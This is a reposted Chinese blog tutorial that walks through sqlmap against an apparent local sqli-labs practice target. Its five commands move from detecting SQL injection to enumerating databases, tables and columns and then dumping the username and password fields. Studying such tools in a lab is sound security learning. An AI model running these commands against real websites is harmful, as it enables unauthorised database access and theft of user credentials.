【20171116早】sqlmap 掃描sql注入漏洞

本文轉載自查看原文 2017-11-16 07:41 1108

sqlmap發現並利用sql注入的利器，值得記錄使用過程：

1、檢測是否存在漏洞：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
2、獲取數據庫信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
3、數據庫表信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
4、表中字段信息
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
5、字段值數據
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 SQLmap檢測sql注入漏洞 sqlmap查找SQL注入漏洞入門 SQL注入之sqlmap進階 burpsuite聯合sqlmap掃描注入點【SQL注入】之SQLMAP工具的使用 CentOS 7 通過SQLmap進行SQL注入 xray漏洞掃描模塊——xss、sql注入、命令注入、目錄遍歷、xxe、文件上傳、弱口令等 SQLMAP解決SQL注入CTF題目利用sqlmap對網站進行sql注入檢測簡述sql注入漏洞